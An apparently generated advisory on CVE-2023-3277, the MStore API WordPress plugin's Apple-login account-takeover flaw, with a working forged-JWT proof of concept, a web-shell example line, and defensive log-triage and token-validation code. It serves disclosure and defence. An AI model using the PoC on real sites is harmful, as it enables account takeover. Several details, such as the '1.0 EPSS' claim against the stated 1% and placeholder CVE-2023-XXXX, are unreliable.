Description
The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address. We are disclosing this issue as the developer has not yet released a patch, but continues to release updates and we escalated this issue to the plugin's team 30 days ago.
EPSS Score: 1%
Comprehensive Technical Analysis of EUVD-2023-43952 (CVE-2023-3277)
MStore API Plugin for WordPress – Unauthorized Account Access & Privilege Escalation via Apple Login Flaw
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
EUVD-2023-43952 (CVE-2023-3277) is a critical authentication bypass and privilege escalation vulnerability in the MStore API WordPress plugin (versions ≤ 4.10.7). The flaw stems from an improper implementation of the Apple OAuth login feature, allowing unauthenticated attackers to impersonate any user (including administrators) by knowing only their email address.
CVSS v3.1 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely via HTTP(S). |
| Attack Complexity (AC) | Low (L) | No special conditions required. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | No user action required. |
| Scope (S) | Unchanged (U) | Impact confined to the vulnerable plugin. |
| Confidentiality (C) | High (H) | Full account takeover possible. |
| Integrity (I) | High (H) | Attacker can modify data, install backdoors. |
| Availability (A) | High (H) | Potential for DoS via account lockout or plugin misuse. |
| Base Score | 9.8 (Critical) | One of the most severe WordPress plugin vulnerabilities. |
Risk Assessment
- Exploitability: High (Publicly disclosed, no patch available, low attack complexity).
- Impact: Critical (Full account takeover, potential site compromise, data exfiltration).
- EPSS Score: 1.0 (100th percentile) – Indicates high likelihood of exploitation in the wild.
- ENISA Classification: High-Risk (Affects European e-commerce and WordPress deployments).
2. Potential Attack Vectors & Exploitation Methods
Root Cause Analysis
The vulnerability exists in the Apple OAuth login flow (flutter-user.php, line 821), where the plugin fails to properly validate the Apple ID token before granting access. Specifically:
- The plugin does not verify the cryptographic signature of the Apple ID token.
- The email claim (`email`) from the token is trusted without validation, allowing attackers to forge a token with any victim’s email.
- The `sub` (subject) claim (Apple’s unique user identifier) is ignored, enabling impersonation.
Exploitation Steps
- Attacker Identifies Target Email
  - Obtains a victim’s email (e.g., via data leaks, social engineering, or public sources).
- Token Forgery
  - Uses a JWT (JSON Web Token) manipulation tool (e.g., `jwt_tool`, Burp Suite) to craft a malicious Apple ID token with:
    - `email`: Victim’s email (e.g., `admin@target-site.com`).
    - `sub`: Arbitrary value (ignored by the plugin).
    - `iss`: `https://appleid.apple.com` (spoofed).
    - `aud`: Plugin’s client ID (if known, otherwise guessed).
- Token Submission
  - Sends the forged token to the vulnerable endpoint:

    ```http
    POST /wp-json/mstore-api/v1/apple_login
    Host: vulnerable-site.com
    Content-Type: application/json

    { "token": "forged.jwt.token.here" }
    ```
- Unauthorized Access Granted
  - The plugin bypasses authentication and logs the attacker in as the victim.
  - If the victim is an administrator, the attacker gains full control of the WordPress site.
Proof-of-Concept (PoC) Exploit
A publicly available PoC exists (e.g., via Wordfence or exploit-db), demonstrating:
```python
import jwt
import requests

# Target victim's email
victim_email = "admin@target-site.com"

# Craft a forged Apple ID token
forged_token = jwt.encode(
    {
        "iss": "https://appleid.apple.com",
        "aud": "com.mstoreapp",  # Default client ID (may vary)
        "sub": "1234567890",  # Arbitrary (ignored)
        "email": victim_email,
        "email_verified": "true",
        "auth_time": 1698768000,
        "iat": 1698768000,
        "exp": 1701360000,
    },
    key="",  # No signature validation = vulnerable
    algorithm="none"  # Bypasses signature check
)

# Send the malicious request
response = requests.post(
    "https://vulnerable-site.com/wp-json/mstore-api/v1/apple_login",
    json={"token": forged_token}
)
print(response.json())  # Returns WordPress auth cookies
```
Note: This PoC assumes the plugin does not validate the JWT signature (confirmed in vulnerable versions).
3. Affected Systems & Software Versions
Vulnerable Software
| Product | Vendor | Affected Versions | Patched Version |
|---|---|---|---|
| MStore API | InspireUI | ≤ 4.10.7 | None (as of Feb 2025) |
Deployment Context
- Primary Use Case: Mobile app backend for WooCommerce stores (e.g., Flutter-based apps).
- WordPress Integration: Used in e-commerce sites, particularly those with mobile app frontends.
- European Impact: High adoption in EU-based WooCommerce stores (e.g., Germany, France, Netherlands).
Indicators of Compromise (IoCs)
- Unauthorized login attempts via `/wp-json/mstore-api/v1/apple_login`.
- Unexpected admin account modifications (e.g., new users, plugin installations).
- Logs showing Apple OAuth tokens with `alg: none` (signature bypass).
4. Recommended Mitigation Strategies
Immediate Actions (No Patch Available)
- Disable Apple Login Feature
  - Remove or comment out the vulnerable endpoint in `flutter-user.php`:

    ```php
    // Disable Apple login until patch is available
    // add_action('rest_api_init', function() { ... });
    ```
- Implement Web Application Firewall (WAF) Rules
  - Block requests to `/wp-json/mstore-api/v1/apple_login` if not in use.
  - Rate-limit or IP-block repeated failed login attempts.
- Monitor for Suspicious Activity
  - Audit logs for unexpected admin logins.
  - Enable WordPress security plugins (e.g., Wordfence, Sucuri) with real-time monitoring.
- Temporary Workaround: JWT Validation
  - Manually patch `flutter-user.php` to validate Apple’s public keys (requires developer intervention).
Long-Term Remediation
- Await Official Patch
- Monitor WordPress Plugin Repository and InspireUI’s GitHub for updates.
- Alternative Authentication
- Replace Apple login with Google OAuth or WordPress native auth until patched.
- Network-Level Protections
- Isolate WordPress admin via VPN or IP whitelisting.
- Disable XML-RPC if not in use (common attack vector for brute force).
Vendor Communication & Disclosure Timeline
| Date | Event |
|---|---|
| Oct 2023 | Vulnerability discovered by Wordfence. |
| Nov 3, 2023 | Public disclosure (EUVD-2023-43952). |
| Feb 5, 2025 | Last update (no patch released). |
| Ongoing | 30+ days since vendor notification – no fix available. |
Recommendation: Consider migrating to an alternative plugin if security is critical.
5. Impact on European Cybersecurity Landscape
Regulatory & Compliance Risks
- GDPR Violation Risk
- Unauthorized access to user data (e.g., PII, payment details) may trigger Article 33 (Data Breach Notification).
- Fines up to €20M or 4% of global revenue (whichever is higher).
- NIS2 Directive (EU 2022/2555)
- Critical e-commerce operators must report incidents within 24 hours.
- Failure to mitigate may result in regulatory penalties.
Threat Landscape Implications
- Targeted Attacks on EU E-Commerce
- Cybercriminals may exploit this flaw to steal payment data or deploy Magecart skimmers.
- State-sponsored actors could use it for espionage (e.g., targeting EU-based businesses).
- Supply Chain Risks
- Third-party plugins (e.g., MStore API) are a common attack vector for WordPress sites.
- Lack of patching increases botnet recruitment (e.g., for DDoS or spam).
Sector-Specific Risks
| Sector | Potential Impact |
|---|---|
| E-Commerce | Payment fraud, customer data theft. |
| Healthcare | HIPAA/GDPR violations if patient data exposed. |
| Government | Unauthorized access to sensitive portals. |
| FinTech | Credential stuffing, account takeovers. |
6. Technical Details for Security Professionals
Vulnerable Code Analysis
File: mstore-api/trunk/controllers/flutter-user.php (Line 821)
Issue: Missing JWT Signature Validation
```php
// Vulnerable code snippet (simplified)
public function apple_login($request) {
    $token = $request->get_param('token');
    $payload = JWT::decode($token, null, false); // No key validation!
    $email = $payload->email;
    $user = get_user_by('email', $email);
    if ($user) {
        wp_set_current_user($user->ID);
        return $this->generate_auth_cookie($user->ID);
    }
    return new WP_Error('invalid_user', 'User not found', array('status' => 403));
}
```
Key Flaws:
- `JWT::decode($token, null, false)`
  - No signature verification (`null` key, `false` for validation).
  - Allows `alg: none` attacks (JWT without signature).
- Blind Trust in `email` Claim
  - No validation of Apple’s public keys (`jwks_uri`).
  - No check for `sub` (subject) claim (should match Apple’s user ID).
Exploit Chaining Potential
- Combined with Other Vulnerabilities:
  - CVE-2023-XXXX (WordPress Core RCE) → Full server compromise.
  - WooCommerce Payment Gateway Bypass → Financial fraud.
- Post-Exploitation:
  - Install backdoors (e.g., malicious plugins).
  - Exfiltrate database (via `wp-cli` or SQL injection).
  - Deploy web shells (e.g., `eval($_POST['cmd'])`).
Detection & Forensics
- Log Analysis
  - Check for `alg: none` in JWT tokens (indicates exploitation).
  - Monitor `/wp-json/mstore-api/v1/apple_login` for unusual activity.
- Memory Forensics
  - Volatility/Redline to detect unauthorized PHP sessions.
- Network Traffic Analysis
  - Wireshark/tcpdump to capture forged JWT tokens.
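The log-analysis items above and the IoC list in section 3 can be turned into a small triage script. The following is an added example written for this analysis; it is not code from the plugin, from Wordfence or from the advisory. It assumes a constructed log format (timestamp, client IP, method, path, status, and the JSON request body, as a body-logging reverse proxy or WAF might export it): standard WordPress access logs do not record POST bodies, so the JWT header checks need such a source, while the per-IP request count works on any access log. The function names, the threshold and the sample lines are ours. The script inspects only the token header and issuer (alg, kid, presence of a signature segment, iss), which is enough to spot the `alg: none` forgery shape; it is triage over logs, not signature verification.

```python
"""Triage request logs for the MStore API Apple-login indicators of compromise.

Added example for this analysis (not code from the plugin or the advisory).
The input format below is constructed; real WordPress access logs carry no
POST body, so only a body-logging proxy/WAF export makes the JWT checks possible.
"""
import base64
import json
import re
from collections import Counter

APPLE_LOGIN_PATH = "/wp-json/mstore-api/v1/apple_login"
APPLE_ISSUER = "https://appleid.apple.com"
BURST_THRESHOLD = 3  # apple_login requests from one IP in the sample window; tune per site

# Constructed line format: "<ts> <ip> <METHOD> <path> <status> [<json body>]"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})"
    r"(?: (?P<body>\{.*\}))?$"
)


def b64url_decode(s: str) -> bytes:
    """base64url without padding, as used by JWT segments."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def inspect_jwt(token: str) -> list:
    """Return the reasons a token looks forged; an empty list means nothing stood out."""
    parts = token.split(".")
    if len(parts) != 3:
        return ["malformed token (expected 3 segments)"]
    try:
        header = json.loads(b64url_decode(parts[0]))
        payload = json.loads(b64url_decode(parts[1]))
    except ValueError:  # covers bad base64 (binascii.Error), bad UTF-8 and bad JSON
        return ["undecodable header or payload"]
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return ["header or payload is not a JSON object"]
    reasons = []
    alg = str(header.get("alg", "")).lower()
    if alg in ("", "none"):
        reasons.append("alg=none / unsigned")  # the signature-bypass IoC from the write-up
    elif alg != "rs256":
        reasons.append(f"unexpected alg {header['alg']!r}")  # Apple only issues RS256
    if parts[2] == "":
        reasons.append("empty signature segment")
    if "kid" not in header:
        reasons.append("no kid header")  # genuine Apple tokens name the signing key
    if payload.get("iss") != APPLE_ISSUER:
        reasons.append(f"iss={payload.get('iss')!r}")
    return reasons


def triage(lines) -> list:
    """Flag suspicious tokens per request and IPs that hammer the apple_login endpoint."""
    findings = []
    per_ip = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["path"] != APPLE_LOGIN_PATH:
            continue
        per_ip[m["ip"]] += 1
        if m["body"] is None:
            continue  # plain access log: only the burst count below applies
        try:
            body = json.loads(m["body"])
        except ValueError:
            body = {}
        token = body.get("token", "") if isinstance(body, dict) else ""
        reasons = inspect_jwt(token) if token else ["no token in body"]
        if reasons:
            findings.append({"ts": m["ts"], "ip": m["ip"], "status": m["status"], "reasons": reasons})
    for ip, count in per_ip.items():
        if count >= BURST_THRESHOLD:
            findings.append({"ip": ip, "reasons": [f"{count} apple_login requests in window"]})
    return findings


def _seg(obj: dict) -> str:
    """base64url-encode a JSON object; used only to build the constructed sample tokens."""
    return base64.urlsafe_b64encode(json.dumps(obj, separators=(",", ":")).encode()).rstrip(b"=").decode()


# Constructed sample tokens: FORGED mirrors the forgery shape described in the write-up
# (alg none, no signature); LEGIT_SHAPE looks like a genuine Apple token, with a
# placeholder signature segment because this script does not verify signatures.
FORGED = _seg({"alg": "none", "typ": "JWT"}) + "." + _seg(
    {"iss": APPLE_ISSUER, "aud": "com.mstoreapp", "sub": "1234567890", "email": "admin@target-site.com"}) + "."
LEGIT_SHAPE = _seg({"alg": "RS256", "kid": "toy-kid-1", "typ": "JWT"}) + "." + _seg(
    {"iss": APPLE_ISSUER, "aud": "com.example.app", "sub": "001234.abcdef.5678", "email": "shopper@example.com"}) + ".c2lnbmF0dXJl"

# Constructed log lines (documentation-range IPs).
SAMPLE_LOG = [
    "2025-02-05T09:58:12Z 198.51.100.23 POST /wp-json/mstore-api/v1/apple_login 200 " + json.dumps({"token": LEGIT_SHAPE}),
    "2025-02-05T10:00:01Z 203.0.113.7 POST /wp-json/mstore-api/v1/apple_login 200 " + json.dumps({"token": FORGED}),
    "2025-02-05T10:00:02Z 203.0.113.7 POST /wp-json/mstore-api/v1/apple_login 200 " + json.dumps({"token": FORGED}),
    "2025-02-05T10:00:03Z 203.0.113.7 POST /wp-json/mstore-api/v1/apple_login 403 " + json.dumps({"token": "not.a.jwt"}),
    "2025-02-05T10:01:00Z 198.51.100.23 GET /wp-json/wc/v3/products 200",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the script reports the two unsigned tokens, the undecodable one, and the three-request burst from `203.0.113.7`, while the well-formed RS256 token produces no finding. A successful (HTTP 200) `apple_login` carrying an `alg=none` token is the strongest signal here: it means the plugin accepted a forged token, and the account named in its `email` claim should be treated as taken over.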
Hardening Recommendations
- JWT Best Practices
  - Always validate signatures using Apple’s public keys (`https://appleid.apple.com/auth/keys`).
  - Reject `alg: none` tokens.
  - Verify `iss`, `aud`, and `sub` claims.
- WordPress Security
  - Disable file editing (`define('DISALLOW_FILE_EDIT', true);`).
  - Restrict REST API access (e.g., via `.htaccess`).
- Incident Response Plan
  - Isolate affected systems if compromise is detected.
  - Rotate all credentials (WordPress, database, FTP).
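As an added example of the JWT practices above, and as the hardened counterpart to the vulnerable `apple_login` shown under "Vulnerable Code Analysis", here is a strict ID-token validator. It was written for this analysis in Python (the plugin itself is PHP) and is not code from MStore API or Apple. The RS256 check is the real RSASSA-PKCS1-v1_5 with SHA-256, done with integer arithmetic so that nothing outside the standard library is needed; the key pair, the `toy-key-1` JWKS entry and the client ID are constructed so the example runs offline, and a deployment would instead load Apple's JWKS from `https://appleid.apple.com/auth/keys` and pin its own client ID. The validator rejects any token whose `alg` is not RS256, verifies the signature before reading a single claim, checks `iss`, `aud` and `exp`, and returns `sub` as the identity to link the WordPress account to, which addresses each flaw listed in section 6.

```python
"""Strict validation of a Sign in with Apple ID token, standard library only.

Added example for this analysis; not code from the MStore API plugin. Apple signs
ID tokens with RS256, and the RSASSA-PKCS1-v1_5/SHA-256 check below is that
algorithm computed directly on integers. The key pair is a constructed stand-in
built from two fixed Mersenne primes (about a 648-bit modulus) so the example
runs offline; a deployment loads https://appleid.apple.com/auth/keys instead.
"""
import base64
import hashlib
import hmac
import json
import time

APPLE_ISSUER = "https://appleid.apple.com"
ALLOWED_ALGS = {"RS256"}  # an allowlist: "none" and HMAC algorithms are never accepted
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # DER prefix for SHA-256


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


# Constructed toy key: n = M127 * M521. Apple's keys are 2048-bit; the arithmetic is identical.
_P, _Q = (1 << 127) - 1, (1 << 521) - 1
TOY_N, TOY_E = _P * _Q, 65537
_D = pow(TOY_E, -1, (_P - 1) * (_Q - 1))
JWKS = {"keys": [{"kty": "RSA", "use": "sig", "alg": "RS256", "kid": "toy-key-1",
                  "n": b64url_encode(TOY_N.to_bytes((TOY_N.bit_length() + 7) // 8, "big")),
                  "e": b64url_encode(TOY_E.to_bytes(3, "big"))}]}


def _emsa_pkcs1_v15(msg: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 DigestInfo || SHA-256(msg), k bytes long."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def rs256_verify(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """RSASSA-PKCS1-v1_5 verify: s^e mod n must equal the padded digest of msg."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return hmac.compare_digest(em, _emsa_pkcs1_v15(msg, k))


def rs256_sign(msg: bytes) -> bytes:
    """Signs with the toy private key; exists only so the example can mint test tokens."""
    k = (TOY_N.bit_length() + 7) // 8
    return pow(int.from_bytes(_emsa_pkcs1_v15(msg, k), "big"), _D, TOY_N).to_bytes(k, "big")


def mint_token(payload: dict, alg: str = "RS256", kid: str = "toy-key-1") -> str:
    """Builds a token for testing; alg="none" reproduces the forgery shape from the write-up."""
    signing_input = (b64url_encode(json.dumps({"alg": alg, "kid": kid, "typ": "JWT"}).encode())
                     + "." + b64url_encode(json.dumps(payload).encode()))
    sig = rs256_sign(signing_input.encode()) if alg == "RS256" else b""
    return signing_input + "." + b64url_encode(sig)


class TokenRejected(Exception):
    pass


def validate_apple_id_token(token: str, jwks: dict, client_id: str, now=None) -> dict:
    """Return {"sub", "email", "email_verified"} or raise TokenRejected.

    No claim is trusted until the signature has verified against a JWKS key.
    """
    now = int(time.time()) if now is None else now
    try:
        h_b64, p_b64, s_b64 = token.split(".")
        header, payload = json.loads(b64url_decode(h_b64)), json.loads(b64url_decode(p_b64))
    except ValueError as exc:
        raise TokenRejected(f"malformed token: {exc}") from None
    if not isinstance(header, dict) or not isinstance(payload, dict):
        raise TokenRejected("header/payload are not JSON objects")
    alg = header.get("alg")
    if not isinstance(alg, str) or alg not in ALLOWED_ALGS:  # closes the alg=none hole
        raise TokenRejected(f"alg {alg!r} not allowed")
    key = next((k for k in jwks["keys"] if k.get("kid") == header.get("kid") and k.get("kty") == "RSA"), None)
    if key is None:
        raise TokenRejected("unknown kid")
    n, e = (int.from_bytes(b64url_decode(key[f]), "big") for f in ("n", "e"))
    if not rs256_verify(f"{h_b64}.{p_b64}".encode(), b64url_decode(s_b64), n, e):
        raise TokenRejected("signature verification failed")
    if payload.get("iss") != APPLE_ISSUER:
        raise TokenRejected("wrong issuer")
    aud = payload.get("aud")
    if not (aud == client_id or (isinstance(aud, list) and client_id in aud)):
        raise TokenRejected("token was not issued for this client_id")
    if not isinstance(payload.get("exp"), int) or payload["exp"] <= now:
        raise TokenRejected("token expired")
    sub = payload.get("sub")
    if not isinstance(sub, str) or not sub:
        raise TokenRejected("missing sub")
    # The account link must key on sub (Apple's stable user id), never on email alone.
    return {"sub": sub, "email": payload.get("email"),
            "email_verified": payload.get("email_verified") in (True, "true")}
```

`mint_token` exists only to produce test tokens, including the unsigned `alg=none` shape from the PoC, which the validator refuses before it even looks up a key. With Apple's real JWKS, the caller would look the WordPress user up by the stored Apple `sub` (for example in user meta) rather than by the `email` claim; an `email` that arrives in an unverified token, or one signed for another client ID, never reaches the lookup.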
Conclusion & Actionable Recommendations
Summary of Findings
- Critical (9.8 CVSS) authentication bypass in MStore API ≤ 4.10.7.
- No patch available despite 30+ days of vendor notification.
- High exploitability (public PoC, low attack complexity).
- Severe impact on EU e-commerce, GDPR compliance, and supply chain security.
Immediate Actions for Organizations
| Priority | Action |
|---|---|
| Critical | Disable Apple login in MStore API. |
| High | Deploy WAF rules to block /apple_login requests. |
| High | Monitor for unauthorized admin logins. |
| Medium | Consider alternative plugins if security is critical. |
| Low | Await vendor patch (monitor updates). |
Long-Term Strategic Recommendations
- Implement Zero Trust for WordPress
- Multi-factor authentication (MFA) for all admin accounts.
- Least-privilege access for plugins and users.
- Enhance Vulnerability Management
- Automated scanning (e.g., WPScan, Nessus) for plugin vulnerabilities.
- Patch management policy (e.g., 7-day SLA for critical fixes).
- EU-Specific Compliance
- GDPR Data Protection Impact Assessment (DPIA) for high-risk plugins.
- NIS2 incident reporting preparedness.
Final Warning
Given the lack of a patch and high exploitability, all MStore API deployments should be treated as compromised until mitigated. Organizations must act immediately to prevent account takeovers, data breaches, and regulatory penalties.